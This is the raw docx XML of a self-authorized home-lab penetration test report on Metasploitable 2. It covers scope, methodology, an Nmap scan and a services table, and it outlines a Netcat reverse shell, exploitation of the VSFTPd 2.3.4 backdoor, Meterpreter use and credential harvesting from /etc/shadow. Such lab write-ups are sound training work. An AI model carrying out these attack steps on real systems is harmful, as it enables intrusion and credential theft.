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0423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRPr="003E4BB0" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="C0504D" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0504D" w:themeColor="accent2"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="CC0000"/>
        </w:pBdr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4BB0">
        <w:rPr>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Reverse Shell Lab — Home Lab Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4BB0" w:rsidRPr="003E4BB0" w:rsidRDefault="003E4BB0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="CC0000"/>
        </w:pBdr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="72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040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Report Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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rsidR="00040423" w:rsidRPr="003E4BB0" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E4BB0">
              <w:rPr>
                <w:b/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse Shell Lab — Penetration Test Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target System</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40423" w:rsidRDefault="007200C9">
            <w:r w:rsidRPr="003E4BB0">
              <w:rPr>
                <w:b/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (192.168.56.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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rsidR="00040423" w:rsidRDefault="003E4BB0">
            <w:r w:rsidRPr="003E4BB0">
              <w:rPr>
                <w:b/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007200C9">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (192.168.56.6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessment Type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40423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Offensive Security Home Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Test Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Isolated VirtualBox Host-Only Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Report Author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40423" w:rsidRPr="003E4BB0" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E4BB0">
              <w:rPr>
                <w:b/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cleveland</w:t>
            </w:r>
            <w:r w:rsidR="003E4BB0" w:rsidRPr="003E4BB0">
              <w:rPr>
                <w:b/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Henry Lore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Report Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>March 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Classification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40423" w:rsidRPr="003E4BB0" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E4BB0">
              <w:rPr>
                <w:b/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CONFIDENTIAL — Educational Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="003E4BB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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9" w:rsidP="003E4BB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FOR EDUCATIONA</w:t>
      </w:r>
      <w:r w:rsidR="003E4BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L PURPOSES ONLY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This report documents a penetration test conducted against Metasploitable 2, an intentionally vulnerable Linux virtual machine, within a fully isolated VirtualBox home lab environment. The assessment was performed to develop and demonstrate practical offen</w:t>
      </w:r>
      <w:r>
        <w:t>sive security skills including network reconnaissance, vulnerability exploitation, reverse shell establishment, post-exploitation, and network traffic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The assessment identified multiple critical vulnerabilities that allowed complete system compr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">omise. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E4BB0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A manual reverse shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was successfully established using Netcat, and full root access was obtained by exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="003E4BB0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CVE-2011-2523</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a known </w:t>
      </w:r>
      <w:r w:rsidRPr="003E4BB0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>backdoor in VSFTPd version 2.3.4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Post-exploitation activities included Meterpreter session establishment, proce</w:t>
      </w:r>
      <w:r>
        <w:t>ss enumeration, and credential harvesting via the /etc/shadow file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>All findings are presented with full technical detail, evidence, risk ratings, and remediation guidance. The assessment also includes a blue team perspective documenting detection signatu</w:t>
      </w:r>
      <w:r>
        <w:t>res for each attack technique used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Risk Summary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860"/>
      </w:tblGrid>
      <w:tr w:rsidR="00040423">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Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="586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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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Immediate root access achievable with public exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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3</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Significant attack surface exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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Unencrypted protocols and plaintext credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Informational exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Key Findings at a Glance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Critical: </w:t>
      </w:r>
      <w:r>
        <w:t>VSFTPd 2.3.4 backdoor (CVE-2011-2523) provided instant root shell access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Critical: </w:t>
      </w:r>
      <w:r>
        <w:t>Netcat reverse shell successfully bypassed simulated firewall restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">High: </w:t>
      </w:r>
      <w:r>
        <w:t>Meterpreter session established with full post-exploitation capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">High: </w:t>
      </w:r>
      <w:r>
        <w:t>All plaintext shell traffic captured and readable in Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">High: </w:t>
      </w:r>
      <w:r>
        <w:t>MySQL running with no root password — database fully exposed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Medium: </w:t>
      </w:r>
      <w:r>
        <w:t>Kernel version 2.6.24 (2008) — numerous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> local privilege escalation CVEs available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Scope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40423">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lastRenderedPageBreak/>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Target IP</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192.168.56.5 (Metasploitable 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Attacker IP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192.168.56.6 (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Network</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192.168.56.0/24 — Host-Only (Isolated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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In Scope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All services on target VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Out of Scope</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Any system outside the VirtualBox Host-Only network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Test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Black-box → White-box (full lab access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Authorization</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Self-authorized — tester owns both VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The assessment followed a structured penetration testing methodology aligned with industry standards:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">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860"/>
      </w:tblGrid>
      <w:tr w:rsidR="00040423">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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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Activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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1. Reconnaissance</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Network scanning, service enumeration, OS fingerprinting, version detection</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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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2. Vulnerability Analysis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CVE research on discovered service versions, attack surface mapping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Manual research, Metasploit search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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3. Exploitation</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Reverse shell via Netcat, VSFTPd backdoor exploitation via Metasploit</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Netcat, Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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4. Post-Exploitation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Session upgrade to Meterpreter, process listing, credential harvesting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Meterpreter, /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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5. Traffic Analysis</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Full packet capture and TCP stream analysis of all attack traffic</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Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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6. Reporting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Documentation of findings, evidence, risk ratings and remediation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This report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>3. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Nmap Service Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>An Nmap scan with service version detection, default scripts, and OS fingerprinting was run against the target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap -sV -sC -O 192.168.56.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.2 Discovered Services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500"/>
        <w:gridCol w:w="4160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00040423">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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="416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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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21/tcp</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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>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VSFTPd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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CRITICAL — Known backdoor CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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22/tcp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SSH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OpenSSH 4.7p1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MEDIUM — Outdated version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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23/tcp</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Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>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Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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HIGH — Plaintext protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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25/tcp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SMTP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Postfix smtpd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MEDIUM — Mail relay risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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80/tcp</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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>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Apache 2.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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HIGH — Outdated, multiple CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
